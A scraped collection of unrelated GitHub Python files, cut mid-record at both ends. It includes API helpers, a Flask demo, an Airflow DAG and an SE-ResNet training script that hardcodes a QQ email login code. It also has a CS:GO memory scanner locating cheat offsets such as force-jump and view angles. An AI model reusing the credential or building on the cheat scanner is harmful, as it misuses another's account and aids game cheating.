base64_encode\n\n\nclass File(Request):\n \"\"\"\n Requests for assigned files\n \"\"\"\n\n def add(self, object_id: int, file_path: str, description: Optional[str] = None) -> None:\n \"\"\"\n Add a new file to a specific object.\n A new file object will be created and assigned to the specific object.\n\n :param int object_id: Object identifier\n :param str file_path: Path to file\n :param str description: (Optional) description\n :raises: :py:exc:`~idoitapi.APIException.APIException` on error\n :raises: :py:exc:`OSError` if file not 
found or unreadable\n \"\"\"\n file_object_id = CMDBObject(self._api).create(\n 'C__OBJTYPE__FILE',\n description if description is not None else ''\n )\n\n cmdb_category = CMDBCategory(self._api)\n\n cmdb_category.create(\n file_object_id,\n 'C__CATS__FILE_VERSIONS',\n {\n 'file_content': base64_encode(file_path),\n 'file_physical': os.path.basename(file_path),\n 'file_title': description,\n 'version_description': description\n }\n )\n\n cmdb_category.create(\n object_id,\n 'C__CATG__FILE',\n {\n 'file': file_object_id\n },\n )\n\n def batch_add(self, object_id: int, files: Dict) -> None:\n \"\"\"\n Add multiple new files to a specific object.\n New file objects will be created and assigned to the specific object.\n\n :param int object_id: Object identifier\n :param dict files: Dict (key: path to file; value: description)\n :raises: :py:exc:`~idoitapi.APIException.APIException` on error\n :raises: :py:exc:`OSError` if any file not found or unreadable\n \"\"\"\n objects = []\n\n for description in files.values():\n objects.append({\n 'type': 'C__OBJTYPE__FILE',\n 'title': description,\n })\n\n file_object_ids = CMDBObjects(self._api).create(objects)\n\n if len(file_object_ids) != len(files):\n raise JSONRPC(\n message='Wanted to create {} file object(s) but got {} object identifiers'.format(\n len(files), len(file_object_ids)\n )\n )\n\n requests = []\n\n counter = 0\n\n for file_path, description in files.items():\n requests.append({\n 'method': 'cmdb.category.create',\n 'params': {\n 'objID': file_object_ids[counter],\n 'catsID': 'C__CATS__FILE_VERSIONS',\n 'data': {\n 'file_content': base64_encode(file_path),\n 'file_physical': os.path.basename(file_path),\n 'file_title': description,\n 'version_description': description\n }\n }\n })\n\n requests.append({\n 'method': 'cmdb.category.create',\n 'params': {\n 'objID': object_id,\n 'catgID': 'C__CATG__FILE',\n 'data': {\n 'file': file_object_ids[counter],\n }\n }\n })\n\n counter += 1\n\n self._api.batch_request(requests)\n","repo_name":"mvorl/i-doit_API","sub_path":"idoitapi/File.py","file_name":"File.py","file_ext":"py","file_size_in_byte":3670,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"2338784122","text":"from ctypes import *\nimport gi\nimport platform\nimport os\nimport json\nimport logging\nfrom adaflow.av.utils import NumpyArrayEncoder\n\ngi.require_version('GstVideo', '1.0')\ngi.require_version('GstAudio', '1.0')\ngi.require_version('GLib', '2.0')\ngi.require_version('Gst', '1.0')\n\nlogger = logging.getLogger(\"JSONMetadata\")\nsys_platform = platform.platform().lower()\n\nif \"macos\" in sys_platform or \"darwin\" in sys_platform:\n libgst = CDLL(os.getenv(\"LIB_GSTREAMER_PATH\", \"libflow_gst_plugin.dylib\"))\nelif \"linux\" in sys_platform:\n libgst = CDLL(os.getenv(\"LIB_GSTREAMER_PATH\", \"libflow_gst_plugin.so\"))\nelse:\n print(\"other platform\")\n\n\nclass FLOWJSONMeta(Structure):\n _fields_ = [('_meta_flags', c_int),\n ('_info', c_void_p),\n ('_message', c_char_p)]\n\n\nFLOWJSONMetaPtr = POINTER(FLOWJSONMeta)\n\nlibgst.gst_buffer_add_json_info_meta.argtypes = [c_void_p, c_char_p]\nlibgst.gst_buffer_add_json_info_meta.restype = c_void_p\n\nlibgst.gst_buffer_get_json_info_meta.argtypes = [c_void_p]\nlibgst.gst_buffer_get_json_info_meta.restype = c_char_p\n\nlibgst.gst_buffer_remove_json_info_meta.argtypes = [c_void_p]\nlibgst.gst_buffer_remove_json_info_meta.restype = c_bool\n\n\ndef flow_meta_add(buffer, message):\n # Writes json message to Gst.Buffer\n _ 
= libgst.gst_buffer_add_json_info_meta(hash(buffer), message)\n\n\ndef flow_meta_get(buffer):\n    # Gets json message from Gst.Buffer\n    res = libgst.gst_buffer_get_json_info_meta(hash(buffer))\n    return res.decode('utf-8')\n\n\ndef flow_meta_remove(buffer):\n    # Removes json message from Gst.Buffer\n    libgst.gst_buffer_remove_json_info_meta(hash(buffer))\n\n\ndef flow_meta_add_key(buffer, message, meta_key):\n    # Writes json message to Gst.Buffer with meta_key\n    get_message_str = flow_meta_get(buffer)\n\n    # first metadata added to this buffer\n    if get_message_str == \"NULL\":\n        json_key_v = dict()\n        json_key_v[meta_key] = message\n        json_message = json.dumps(json_key_v, cls=NumpyArrayEncoder)\n        flow_meta_add(buffer, json_message.encode('utf-8'))\n    else:\n        get_message = json.loads(get_message_str)\n        if meta_key in get_message:\n            logger.error('%s is already defined, choose a new key' % meta_key)\n        else:\n            get_message[meta_key] = message\n            json_message = json.dumps(get_message, cls=NumpyArrayEncoder)\n            flow_meta_remove(buffer)\n            flow_meta_add(buffer, json_message.encode('utf-8'))\n","repo_name":"zcloud-jzy/AdaFlow","sub_path":"modules/adaflow-python/src/adaflow/av/metadata/flow_json_meta.py","file_name":"flow_json_meta.py","file_ext":"py","file_size_in_byte":2451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"21571444842","text":"'''\nThis is a simple demo server that calls the pace microservice after a user submits data to a form.\n'''\n\nfrom flask import Flask, request, render_template_string\nimport requests\n\napp = Flask(__name__)\n\n# HTML template for the form (markup reconstructed; field names match the /submit_data handler below)\nFORM_TEMPLATE = \"\"\"\n<!DOCTYPE html>\n<html>\n<head>\n    <title>Pace Calculator</title>\n</head>\n<body>\n    <h1>Pace Calculator</h1>\n    <form action=\"/submit_data\" method=\"post\">\n        <label>Distance (in kilometers):</label>\n        <input type=\"text\" name=\"distance\"><br>\n        <label>Duration (in minutes):</label>\n        <input type=\"text\" name=\"duration\"><br>\n        <input type=\"submit\" value=\"Calculate Pace\">\n    </form>\n</body>\n</html>
\n\n\n\"\"\"\n\n\n@app.route(\"/\")\ndef index():\n return render_template_string(FORM_TEMPLATE)\n\n\n@app.route(\"/submit_data\", methods=[\"POST\"])\ndef submit_data():\n distance = request.form.get(\"distance\")\n duration = request.form.get(\"duration\")\n\n # Prepare the data for the POST request\n data = {\"distance\": distance, \"duration\": duration}\n\n # Make a POST request to the microservice server\n response = requests.post(\"http://localhost:5001/calculate_pace\", json=data)\n\n pace_data = response.json()\n print(f\"\\nGot response. \\n Data: {pace_data} \\n\")\n pace = round(pace_data.get(\"pace\"), 2)\n\n return f\"Your pace is {pace} minutes per kilometer\"\n\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=5000)\n","repo_name":"JHarrisonOSU/Pace-Calculator-Microservice","sub_path":"Demo Server/Demo_Server.py","file_name":"Demo_Server.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11315871055","text":"def singleNumber(nums) -> int:\n \"\"\"\n Given a non-empty array of integers nums, every element appears twice except for one. Find that single one.\n\n Follow up: Could you implement a solution with a linear runtime complexity and without using extra memory?\n >>> singleNumber([2,2,1])\n 1\n >>> singleNumber([4,1,2,1,2])\n 4\n >>> singleNumber([1])\n 1\n\n \"\"\"\n a = 0\n for i in nums:\n a ^= i\n return a\n\n\nif __name__ == '__main__':\n import doctest\n doctest.testmod(verbose=True)\n","repo_name":"AlexVines/my_leetcode_solutions","sub_path":"single_num.py","file_name":"single_num.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7843852977","text":"from odoo import http\nfrom splashpy import Framework\n\n\nclass CurrencyHelper:\n \"\"\"Collection of Static Functions to manage Odoo Currencies\"\"\"\n\n domain = \"res.currency\"\n\n @staticmethod\n def get_main_currency():\n try:\n company = http.request.env['res.company']._get_main_company().read([])\n return CurrencyHelper.load(company[0][\"currency_id\"][0])\n except:\n return None\n\n @staticmethod\n def get_main_currency_code():\n try:\n company = http.request.env['res.company']._get_main_company().read([])\n return company[0][\"currency_id\"][1]\n except Exception as exception:\n Framework.log().fromException(exception)\n return None\n\n @staticmethod\n def get_main_currency_id():\n try:\n company = http.request.env['res.company']._get_main_company().read([])\n return company[0][\"currency_id\"][0]\n except Exception as exception:\n Framework.log().fromException(exception)\n return None\n\n # ====================================================================#\n # Odoo ORM Access\n # ====================================================================#\n\n @staticmethod\n def load(currency_id):\n \"\"\"Load Odoo Object by Id\"\"\"\n currency = CurrencyHelper.getModel().browse([int(currency_id)])\n if len(currency) != 1:\n return False\n\n return currency\n\n @staticmethod\n def getModel():\n \"\"\"Get Currencies Model Class\"\"\"\n return http.request.env[CurrencyHelper.domain].sudo()\n","repo_name":"SplashSync/Odoo","sub_path":"odoo/addons/splashsync/helpers/objects/currency.py","file_name":"currency.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8610793607","text":"import os, 
glob\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\nimport tensorflow as tf\nfrom tensorflow.keras import layers, optimizers, datasets, Sequential\nimport datetime\n# from resnet import resnet18\nfrom keras_squeeze_excite_network.se_resnet import SEResNet18\nimport cv2\nfrom PIL import Image\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\nimport argparse\nimport torch\nimport random, csv\nimport smtplib\nfrom email.mime.text import MIMEText\nfrom email.header import Header\n\ndevices = tf.config.experimental.list_physical_devices('GPU')\n# tf.config.experimental.set_memory_growth(devices[0], True)\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n# tf.random.set_seed(2345)\ncurrent_time = datetime.datetime.now().strftime(('%Y-%m-%d_%H:%M:%S'))\nlog_dir = 'logs/' + current_time\nsummary_writer = tf.summary.create_file_writer(log_dir)\nos.makedirs('weights', exist_ok=True)\n\n# 打开图片并将图片像素以矩阵的形式保存到列表里\n# def import_dataset(csv_file):\n# datas=[]\n\n# file = pd.read_csv(r'af2020cv-2020-05-09-v5-dev/'+csv_file)\n# data = file['FileID'] # 获取名字为flow列的数据\n# list = data.values.tolist() # 将csv文件中flow列中的数据保存到列表中\n\n# for path in tqdm(list):\n# # change_size('af2020cv-2020-05-09-v5-dev/data/'+path+'.jpg')\n# datas.append(np.array(Image.open('af2020cv-2020-05-09-v5-dev/data/'+ path +'.jpg', 'r')))\n\n# datas=np.array(datas)\n# label = file['SpeciesID']\n# labels = label.values.tolist()\n# labels =np.array(labels).reshape(len(labels),1)\n\n# return datas, labels\n\n\n# # 将待测试照片大小转化为32*32*3\n# def change_size(path):\n# img = cv2.imread(path)\n# # print(img)\n# width = 224\n# height = 224\n# dim = (width, height)\n\n# # resize image\n# resized = cv2.resize(img, dim)\n# cv2.imwrite(path, resized)\n\n\n# def preprocess(x, y):\n# # [0~1]\n# x = 2 * tf.cast(x, dtype=tf.float32) / 255. 
- 1\n# y = tf.cast(y, dtype=tf.int32)\n# return x, y\n\n\nassert tf.__version__.startswith('2.')\n\n\nclass Reminder:\n def __init__(self, qq=None, register=None):\n \"\"\"\n :param qq: 发送的qq账号\n :param register: qq邮箱授权吧\n \"\"\"\n self.qq = qq\n self.register = register\n self.server = smtplib.SMTP_SSL(\"smtp.qq.com\", 465)\n\n def send(self, title, detail):\n \"\"\"\n send message\n :param title: the title of the message\n :param detail: the detail of the message\n \"\"\"\n sender = self.qq\n receivers = self.qq\n message = MIMEText(detail, 'plain', 'utf-8')\n message['Subject'] = Header(title, 'utf-8')\n message['From'] = sender\n message['To'] = receivers\n try:\n self.server = smtplib.SMTP_SSL(\"smtp.qq.com\", 465)\n self.server.login(sender, self.register)\n self.server.sendmail(sender, receivers, message.as_string())\n self.server.quit()\n except smtplib.SMTPException as e:\n print(e)\n\n def _register(self):\n self.qq = '434596665@qq.com'\n self.register = 'qbcomikcojwubgca'\n\n\ndef load_csv(root, filename):\n images, labels = [], []\n # read from csv file\n with open(os.path.join(root, filename), 'r') as f:\n reader = csv.reader(f)\n next(reader)\n for row in tqdm(reader):\n img, label = row\n img = os.path.join(root, 'data', img) + '.jpg'\n label = int(label)\n images.append(img)\n labels.append(label)\n assert len(images) == len(labels)\n return images, labels\n\n\nimg_mean = tf.constant([0.485, 0.456, 0.406])\nimg_std = tf.constant([0.229, 0.224, 0.225])\n\n\ndef normalize(x, mean=img_mean, std=img_std):\n # x: [224, 224, 3]\n # mean: [224, 224, 3], std: [3]\n x = (x - mean) / std\n return x\n\n\ndef preprocess(x, y):\n \"\"\"\n preprocess the data\n :param x: the path of the images\n :param y: labels\n \"\"\"\n # data augmentation, 0~255\n x = tf.io.read_file(x)\n x = tf.image.decode_jpeg(x, channels=3)\n # resize the image,you can change the value in the another net\n x = tf.image.resize(x, [224, 224])\n # turn around images\n x = tf.image.random_crop(x, [224, 224, 3])\n # # x: [0,255]=> 0~1\n x = tf.cast(x, dtype=tf.float32) / 255.\n # 0~1 => D(0,1)\n x = normalize(x)\n y = tf.convert_to_tensor(y)\n return x, y\n\n\nprint(\"正在导入数据\")\n# 声明\ntraining = 'training.csv'\ntest = 'annotation.csv'\n\n# 导入数据集(32,32,3,... 
)\n# x, y = load_s(training)\nx, y = load_csv('af2020cv-2020-05-09-v5-dev', 'training.csv')\nx_test, y_test = load_csv('af2020cv-2020-05-09-v5-dev', 'annotation.csv')\n# x_test, y_test = import_dataset(test)\n# y = tf.squeeze(y, axis=1)\n# y_test = tf.squeeze(y_test, axis=1)\n# print(x.shape, y.shape, x_test.shape, y_test.shape)\n\ntrain_db = tf.data.Dataset.from_tensor_slices((x, y))\ntrain_db = train_db.shuffle(1000).map(preprocess).batch(32)\n\ntest_db = tf.data.Dataset.from_tensor_slices((x_test, y_test))\ntest_db = test_db.map(preprocess).batch(256)\n\nsample = next(iter(train_db))\nprint('sample:', sample[0].shape, sample[1].shape,\n tf.reduce_min(sample[0]), tf.reduce_max(sample[0]))\n\n\ndef main(epochs, lr, ckpt_interval, ckpt_path, weights_path):\n reminder = Reminder()\n reminder._register()\n count = 0\n temp = 0\n content_list = []\n # 模型训练\n print('开始训练')\n # [b, 32, 32, 3] => [b, 1, 1, 512]\n # model = resnet18()\n model = SEResNet18()\n # model = ResNet50(include_top=True, squeeze=True, squeeze_type='pre', classes=20)\n model.build(input_shape=(None, 224, 224, 3))\n # model.summary() # 统计网络参数\n # optimizer = optimizers.Adam(lr=1e-3)\n optimizer_init = optimizers.SGD(lr=lr)\n optimizer_sgd1 = optimizers.SGD(learning_rate=lr / 10)\n optimizer_sgd2 = optimizers.SGD(learning_rate=lr / 100)\n optimizer_sgd3 = optimizers.SGD(learning_rate=lr / 1000)\n optimizer = optimizer_init\n # [1, 2] + [3, 4] => [1, 2, 3, 4]\n model.load_weights(weights_path)\n variables = model.trainable_variables\n for epoch in tqdm(range(1, epochs + 1)):\n optimizer = optimizer_init\n if epoch == 20:\n optimizer = optimizer_sgd1\n if epoch == 50:\n optimizer = optimizer_sgd2\n if epoch == 80:\n optimizer = optimizer_sgd3\n for step, (x, y) in enumerate(train_db):\n\n with tf.GradientTape() as tape:\n # [b, 32, 32, 3] => [b, 1, 1, 512]\n out = model(x)\n # [b] => [b, 10]\n y_onehot = tf.one_hot(y, depth=20)\n # compute loss\n loss = tf.losses.categorical_crossentropy(y_onehot, out, from_logits=True)\n loss = tf.reduce_mean(loss)\n # print('loss:', loss)\n\n grads = tape.gradient(loss, variables)\n optimizer.apply_gradients(zip(grads, variables))\n if step % 100 == 0:\n with summary_writer.as_default():\n tf.summary.scalar('loss', float(loss), step=step)\n\n # print('loss: %g, acc: %g' % (loss, acc))\n\n # tf.keras.models.save_model(\n # model, ckpt_path + 'tf_ckpt_%d.h5' % epoch, include_optimizer=True,\n # save_format='tf', signatures=None, options=None\n # )\n try:\n if epoch % ckpt_interval == 0:\n print('保存模型中.....')\n model.save_weights(ckpt_path + 'tf_ckpt_%d.h5' % epoch)\n print('保存成功')\n except KeyboardInterrupt:\n print('训练被中断...正在保存模型')\n model.save_weights(ckpt_path + 'tf_ckpt_%d.h5' % epoch)\n print('保存成功')\n\n total_num = 0\n total_correct = 0\n # 模型测试\n print('\\n目前是 %d 个epoch结束之后的测试,总共 %d' % (epoch, epochs))\n for x, y in test_db:\n out = model(x)\n prob = tf.nn.softmax(out, axis=1)\n pred = tf.argmax(prob, axis=1)\n pred = tf.cast(pred, dtype=tf.int32)\n\n correct = tf.cast(tf.equal(pred, y), dtype=tf.int32)\n correct = tf.reduce_sum(correct)\n\n total_num += x.shape[0]\n total_correct += int(correct)\n\n acc = total_correct / total_num\n with summary_writer.as_default():\n tf.summary.scalar('acc', float(acc), step=epoch)\n print('loss: %f, acc: %f' % (loss, acc))\n if epoch % 10 == 0:\n content_list.append('Epoch %d, Loss: %f, acc: %f\\n' % (epoch, loss, acc))\n #\n if temp > acc:\n count += 1\n if count > 5:\n break\n else:\n count = 0\n temp = acc\n\n reminder.send('SE-ResNet Training', 
str(content_list))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--epoch\", type=int, default=10, help=\"number of epochs\")\n parser.add_argument(\"--batch_size\", type=int, default=64, help=\"number of batch size\")\n parser.add_argument(\"--learning_rate\", type=float, default=0.01, help=\"adjust the learning rate\")\n parser.add_argument(\"--checkpoint_dir\", type=str, default=\"checkpoints/\", help=\"where you save the checkpoint\")\n parser.add_argument(\"--weight_dir\", type=str, default=\"weights/\", help=\"where you save the checkpoint\")\n parser.add_argument(\"--checkpoint_interval\", type=int, default=1, help=\"how many epochs after saving model\")\n parser.add_argument(\"--evaluate_interval\", type=int, default=1, help=\"how many epochs per evaluate model\")\n parser.add_argument(\"--train_path\", type=str, default=\"training.csv\", help=\"where the train image csv file\")\n parser.add_argument(\"--test_path\", type=str, default=\"annotation.csv\", help=\"where the test image csv file\")\n\n os.makedirs(\"checkpoints\", exist_ok=True)\n\n opt = parser.parse_args()\n print(opt)\n\n main(opt.epoch, opt.learning_rate, opt.checkpoint_interval, opt.checkpoint_dir, opt.weight_dir)","repo_name":"Team-Coding-Like-Immortal/underwater-se-resnet","sub_path":"se-resnet/my_seresnet_train.py","file_name":"my_seresnet_train.py","file_ext":"py","file_size_in_byte":10064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38524911638","text":"from app import app, db \nfrom app.models import User, Student, Quiz, Result \n\nstudents = Student.query.all()\nquizzes = Quiz.query.all()\nresults = Result.query.all()\nusers = User.query.all()\n\nall_data = students + quizzes + results + users\n\nfor item in all_data:\n db.session.delete(item)\n\ndb.session.commit()\n\nu = User(username='admin')\nu.set_password('password')\ns1 = Student(first_name='Spongebob', last_name='Squarepants')\ns2 = Student(first_name='Patrick', last_name='Star')\ns3 = Student(first_name='John', last_name='Smith')\nq1 = Quiz(subject='Python Basics', num_of_questions=10, date='February 25th, 2021')\nq2 = Quiz(subject='Python Intermediate', num_of_questions=15, date='March 29th, 2021')\nq3 = Quiz(subject='Advanced SQL', num_of_questions=10, date='April 25th, 2021')\nr1 = Result(student=s1, quiz=q1, score=100)\nr2 = Result(student=s1, quiz=q2, score=85)\nr3 = Result(student=s1, quiz=q3, score=95)\n\nseed = [u, s1, s2, s3, q1, q2, q3]\n\nfor item in seed:\n db.session.add(item)\n\ndb.session.commit()\n\n\n@app.shell_context_processor\ndef make_shell_context():\n return {\"db\": db, \"User\": User, \"Student\": Student, \"Quiz\": Quiz, \"Result\": Result}\n\n\n\n","repo_name":"wilsonvetdev/IS211_Assignment12","sub_path":"grades_app.py","file_name":"grades_app.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71592959528","text":"from datetime import timedelta, datetime\n\nfrom airflow import DAG\nfrom airflow.operators.python_operator import PythonOperator\nfrom airflow.utils.dates import days_ago\nfrom textwrap import dedent\n\ndefault_args = {\n 'owner': 'airflow',\n 'depends_on_past': False,\n 'start_date': datetime(2022, 6, 7),\n 'email': ['airflow@example.com'],\n 'email_on_failure': False,\n 'email_on_retry': False,\n 'retries': 2,\n 'retry_delay': timedelta(minutes=10)\n}\n\n\ndef get_first_task():\n print(f\"This is 
the first task.\")\n\n\ndef get_second_task():\n print(f\"This is the second task.\")\n\n\nwith DAG(\n 'first_dag',\n default_args=default_args,\n description='Our first DAG',\n schedule_interval=timedelta(days=1),\n tags=['first_DAG']\n) as dag:\n\n task_1 = PythonOperator(\n task_id='first_task',\n python_callable=get_first_task,\n dag=dag\n )\n\n task_1.doc_md = dedent(\n \"\"\"\\\n#### Task Documentation\nYou can document your task using the attributes `doc_md` (markdown),\n`doc` (plain text), `doc_rst`, `doc_json`, `doc_yaml` which gets\nrendered in the UI's Task Instance Details page.\n![img](http://montcs.bloomu.edu/~bobmon/Semesters/2012-01/491/import%20soul.png)\n\n\"\"\"\n )\n\n dag.doc_md = __doc__ # providing that you have a docstring at the beginning of the DAG\n dag.doc_md = \"\"\"\n This is some custom documentation .... :))))))\n \"\"\"\n\n task_2 = PythonOperator(\n task_id='second_task',\n python_callable=get_second_task,\n dag=dag\n )\n\n task_1 >> task_2\n","repo_name":"CodingBee77/airflow","sub_path":"dags/first_dag.py","file_name":"first_dag.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73203603687","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nfrom fetchdata.fetch_ticker_data import TicKer\nfrom fetchdata.indicator import EMA_whole_cal, EMA_current_Cal, MACD, MACD_current\n\nclass Demonstation:\n def __init__(self):\n self.figure, self.ax = plt.subplots(2)\n\n def graph_MACD(self, DATA, num):\n MACD = DATA['MACD'].to_numpy()\n single_line = DATA['Single Line'].to_numpy()\n time = pd.to_datetime(DATA.index)\n self.ax[num].plot(time, MACD, color='b', label='MACD')\n self.ax[num].plot(time, single_line, color='g', label='Single Line')\n self.ax[num].axhline(y=0, color='k')\n self.ax[num].axhline(y=1, color='r')\n self.ax[num].axhline(y=-1, color='r')\n self.ax[num].axhline(y=2, color='y')\n self.ax[num].axhline(y=-2, color='y')\n self.ax[num].legend(('MACD', 'Single Line'), bbox_to_anchor=(1.05, 1), loc='upper right', borderaxespad=0.)\n\n def graph_EMA(self, DATA, EMA_list, num):\n time = pd.to_datetime(DATA[0].index)\n for ema in DATA:\n self.ax[num].plot(time, ema)\n self.ax[0].legend(tuple(EMA_list), bbox_to_anchor=(1.05, 1), loc='upper right', borderaxespad=0.)\n\n def draw_axe(self, ticker, data, ema_list, ax0, ax1):\n self.clean_fig()\n DATA = TicKer(ticker).get_price_by_period(data[0], data[1])\n EMA = [EMA_whole_cal(DATA['Close'], days) for days in ema_list]\n macd, ema_12, ema_26 = MACD(DATA['Close'])\n self.graph_EMA(EMA, ema_list, ax0)\n self.graph_MACD(macd, ax1)\n\n def draw_price(self, ticker, data, ax0, ax1):\n DATA = TicKer(ticker).get_price_by_period(data[0], data[1])\n time = pd.to_datetime(DATA.index)\n macd, ema_12, ema_26 = MACD(DATA['Close'])\n self.ax[ax0].plot(time, DATA['Close'], color='g')\n self.ax[ax0].legend(('$'), bbox_to_anchor=(1.05, 1), loc='upper right', borderaxespad=0.)\n self.ax[ax1].plot(time,DATA['Volume'], color='r')\n self.ax[ax1].legend('Volume', bbox_to_anchor=(1.05, 1), loc='upper right', borderaxespad=0.)\n\n def cross_detector(self, data):\n p1 = data[0:1].to_numpy()\n p2 = data[1:2].to_numpy()\n if p1[0] > p2[0] and p1[1] < p2[1] or p1[0] < p2[0] and p1[1] > p2[1]:\n return True\n else:\n return False\n\n def observe(self, macd, ema, ema_list, num, ax0, ax1):\n self.clean_fig()\n self.graph_MACD(macd[num:], ax1)\n EMA = [n[num:] for n in ema]\n self.graph_EMA(EMA, ema_list, ax0)\n\n def 
clean_fig(self):\n self.ax[0].cla()\n self.ax[1].cla()\n\n def show_graph(self, time):\n plt.pause(time)\n\n def title(self, ticker):\n self.figure.suptitle(ticker, fontsize=20)\n\n def close_graph(self):\n plt.close(self.figure)\n\n","repo_name":"Kham-Tran/Python-Stock-indicators","sub_path":"Monitor/Demonstration.py","file_name":"Demonstration.py","file_ext":"py","file_size_in_byte":2799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8675210968","text":"import pymem\r\nimport re\r\n\r\n\r\ndef pogout(modname, pattern, extra = 0, offset = 0, relative = True):\r\n pog = pymem.Pymem(\"csgo.exe\")\r\n out = pymem.process.module_from_name(pog.process_handle, modname)\r\n bytes = pog.read_bytes(out.lpBaseOfDll, out.SizeOfImage)\r\n match = re.search(pattern, bytes).start()\r\n yes_relative = pog.read_int(out.lpBaseOfDll + match + offset) + extra - out.lpBaseOfDll\r\n non_relative = pog.read_int(out.lpBaseOfDll + match + offset) + extra\r\n return [yes_relative, out.lpBaseOfDll] if relative else non_relative\r\n\r\n\r\nPOGdwForceJump = pogout(\"client.dll\", rb\"\\x8B\\x0D....\\x8B\\xD6\\x8B\\xC1\\x83\\xCA\\x02\", 0, 2)\r\nglobal dwForceJump\r\ndwForceJump = POGdwForceJump[1] + POGdwForceJump[0]\r\nPOGlocalPlayer = pogout(\"client.dll\", rb\"\\x8D\\x34\\x85....\\x89\\x15....\\x8B\\x41\\x08\\x8B\\x48\\x04\\x83\\xF9\\xFF\", 4, 3)\r\nglobal localPlayer\r\nlocalPlayer = POGlocalPlayer[0] + POGlocalPlayer[1]\r\nPOGentityList = pogout(\"client.dll\", rb\"\\xBB....\\x83\\xFF\\x01\\x0F\\x8C....\\x3B\\xF8\", 0, 1)\r\nentityList = POGentityList[0] + POGlocalPlayer[1]\r\nPOGclientstate = pogout(\"engine.dll\", rb\"\\xA1....\\x33\\xD2\\x6A\\x00\\x6A\\x00\\x33\\xC9\\x89\\xB0\", 0, 1)\r\ndwclientState = POGclientstate[0] + POGclientstate[1]\r\nPOGviewangles = pogout(\"engine.dll\", rb\"\\xF3\\x0F\\x11\\x80....\\xD9\\x46\\x04\\xD9\\x05\", 0, 4, False) ## returns offset from dwclientstate\r\nviewAngles = POGviewangles","repo_name":"B00Mjack/PyVanguard","sub_path":"PyVanguard/scanner.py","file_name":"scanner.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"8849229825","text":"#!/usr/bin/env python3\n'''Installs dmri_pcconv'''\n\nfrom os import path\nfrom setuptools import setup, find_namespace_packages\n\ninstall_deps = ['torch', 'lightning', 'npy-patcher', 'einops', 'nibabel']\n\nversion = '1.0.0'\nthis_dir = path.abspath(path.dirname(__file__))\nwith open(path.join(this_dir, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(\n name='dmri-pcconv',\n version=version,\n description='Parametric Continuous Convolution framework used for Diffusion MRI.',\n author='Matthew Lyon',\n author_email='matthewlyon18@gmail.com',\n long_description=long_description,\n long_description_content_type='text/markdown',\n python_requires='>=3.8',\n license='MIT License',\n packages=find_namespace_packages(),\n install_requires=install_deps,\n scripts=[],\n classifiers=[\n 'Programming Language :: Python',\n 'Operating System :: Unix',\n 'Operating System :: MacOS',\n ],\n keywords=['ai', 'cv', 'computer-vision', 'mri', 'dmri', 'super-resolution', 'cnn', 'pcconv'],\n)\n","repo_name":"m-lyon/dmri-pcconv","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25190788775","text":"__author__ = 
'Антон'\nwith open('in.txt') as txt:\n data = txt.readlines()\n\nN = int(data[0])\nGR = [[-1 for i in range(N)] for j in range(N)]\nfor i in range(N):\n temp = data[1+i].split(' ')\n temp = [i for i in temp if i != '']\n j = 0\n if temp[j] == '0\\n':\n continue\n while temp[j] != '0\\n':\n GR[int(temp[j])-1][i] = int(temp[j+1])\n j += 2\n\n\ns = int(data[-2]) - 1\nt = int(data[-1]) - 1\n\nS = []\nF = [i for i in range(N)]\nS.append(s)\nF.remove(s)\ndm = [-1 for i in range(N)]\n\n\ndef MAX(G):\n max_dist = -1000\n u = 0\n for v in G:\n if max_dist < dm[v]:\n u = v\n max_dist = dm[v]\n return u\n\ndef WEIGHT(p):\n m = GR[p[0]][p[1]]\n for i in range(2,len(p)-1):\n if m> GR[p[i]][p[i+1]]:\n m = GR[p[i]][p[i+1]]\n return m\n\npred = [-1 for i in range(N)]\n\n# суммы на минимум\n# минимум на максимум\nfor i in range(N):\n if i != s and GR[s][i] >= 0:\n dm[i] = GR[s][i]\n pred[i] = s\n\nfor k in range(N-1):\n w = MAX(F)\n F.remove(w)\n for v in F:\n if min(dm[w], GR[w][v]) > dm[v]:\n dm[v] = min(dm[w], GR[w][v])\n pred[v] = w\n\nwith open(\"out.txt\", 'w') as txt:\n if dm[t] == -1:\n txt.writelines('N')\n else:\n txt.writelines('Y\\n')\n path = []\n v = t\n while v != s:\n path.append(v)\n v = pred[v]\n path.append(v)\n path.reverse()\n txt.writelines(' '.join(map(lambda x: str(x + 1), path)) + '\\n')\n # print(' '.join(map(lambda x: str(x + 1), path)))\n txt.writelines(str(WEIGHT(path)))\n # print(WEIGHT(path))","repo_name":"KowalskiP/University","sub_path":"CA/Dijkstra/dijkstra.py","file_name":"dijkstra.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"13170356996","text":"from turtle import *\r\nimport 